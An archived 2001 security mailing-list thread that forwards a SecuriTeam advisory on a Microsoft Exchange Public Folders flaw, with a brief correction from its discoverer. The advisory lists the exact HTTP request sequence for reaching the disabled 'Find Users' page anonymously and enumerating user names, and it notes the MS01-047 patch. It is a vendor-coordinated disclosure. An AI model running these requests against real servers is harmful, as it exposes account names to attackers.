Re: Exchange Public Folders Information Leakage

From: Noam Rathaus (noamrat_private)
Date: Fri Sep 07 2001 - 16:58:16 PDT

  • Next message: Georges Dagousset: "NASL syntax coloring file for the UltraEdit source editor"

    Sorry,
    
    Note = Not
    
    Thanks
    Noam Rathaus
    http://www.SecuriTeam.com
    http://www.BeyondSecurity.com
    
    Know that you're safe (against Code Red and other vulnerabilities):
    http://www.AutomatedScanning.com/
    
    
      ----- Original Message ----- 
      From: Noam Rathaus 
      To: Felix Huber ; plugins-writersat_private 
      Sent: Friday, September 07, 2001 23:51
      Subject: Re: Exchange Public Folders Information Leakage
    
    
      Hi,
    
      Would a plugin writer note write a plugin for an advisory he releases :} ?
      Its online at: http://scripts.nessus.org
    
    
      Thanks
      Noam Rathaus
      http://www.SecuriTeam.com
      http://www.BeyondSecurity.com
    
      Know that you're safe (against Code Red and other vulnerabilities):
      http://www.AutomatedScanning.com/
    
       
        ----- Original Message ----- 
        From: Felix Huber 
        To: plugins-writersat_private 
        Sent: Friday, September 07, 2001 22:55
        Subject: Fw: Exchange Public Folders Information Leakage
    
    
    
        ----- Original Message -----
        From: "Aviram Jenik" <aviramat_private>
        To: <NTBUGTRAQat_private>
        Sent: Friday, September 07, 2001 11:51 AM
        Subject: Exchange Public Folders Information Leakage
    
    
        > The following security advisory is sent to the securiteam mailing list,
        > and
        > can be found at the SecuriTeam web site: http://www.securiteam.com
        >
        > SUMMARY
        >
        > Microsoft Exchange Server handles anonymous access to its Public Folders
        >
        > insecurely. While administrators may disable the "Find Users" features
        > to
        > prevent anonymous users from enumerating existing user names, a security
        >
        > flaw in Exchange server allows remote attackers with access to the
        > exchange server to run "Find Users".
        >
        > DETAILS
        >
        > Microsoft Exchange's Public Folders options of "Find Users" can be
        > disabled. This, however, does not prevent the users from directly
        > accessing the ASP page (fumsg.asp). The link to the "Find Users" will be
        >
        > hidden, however it is still possible to programmatically access the
        > page.
        >
        > Steps to recreate:
        > 1) Contact:
        > GET /exchange/root.asp?acs=anon HTTP/1.1
        > Host: www.example.com
        >
        >
        > 2) Access the redirected page, and resend the issued cookie.
        > GET /exchange/logonfrm.asp HTTP/1.1
        > Host: www.example.com
        > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
        >
        >
        > 3) Access the redirected page, and resend the issued cookie.
        > GET /exchange/root.asp?acs=anon HTTP/1.1
        > Host: www.example.com
        > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
        >
        >
        > 4) Issue this request to obtain a list of users with the letter 'a' in
        > their name (e.g. Administrator)
        > POST /exchange/finduser/fumsg.asp HTTP/1.1
        > Host: www.example.com
        > Accept: */*
        > Content-Type: application/x-www-form-urlencoded
        > Content-Length: 44
        > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
        >
        > DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
        >
        > Vendor status:
        > Microsoft has been contacted on August 4, 2001. A security bulletin was
        > released on September 7, 2001.
        >
        > Solution:
        > Microsoft has released a patch for this problem. See
        > <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu
        > rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for
        > more information.
        >
        >
        > ADDITIONAL INFORMATION
        > This security hole was discovered by  <mailto:noamrat_private> Noam
        > Rathaus.
        > The information has been provided by  <mailto:expertsat_private>
        > SecuriTeam Experts.
        >
        >
        >
        > ====================
        > ====================
        >
        > DISCLAIMER:
        > The information in this bulletin is provided "AS IS" without warranty of
        > any
        > kind.
        > In no event shall we be liable for any damages whatsoever including
        > direct,
        > indirect, incidental, consequential, loss of business profits or special
        > damages.
        >
        >
        ============================================================================
        > Delivery co-sponsored by Trend Micro, Inc.
        >
        ============================================================================
        > TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE
        >
        > If you are worried about email viruses, you need Trend Micro ScanMail for
        > Exchange. ScanMail is the first antivirus solution that seamlessly
        > integrates with the Microsoft Exchange 2000 virus-scanning API 2.0.
        ScanMail
        > ensures 100% inbound and outbound email virus scanning and provides remote
        > software management. Download a FREE 30-day trial copy of ScanMail and
        find
        > out why it is the best:
        > http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
        >
        ============================================================================
    



    This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 16:03:53 PDT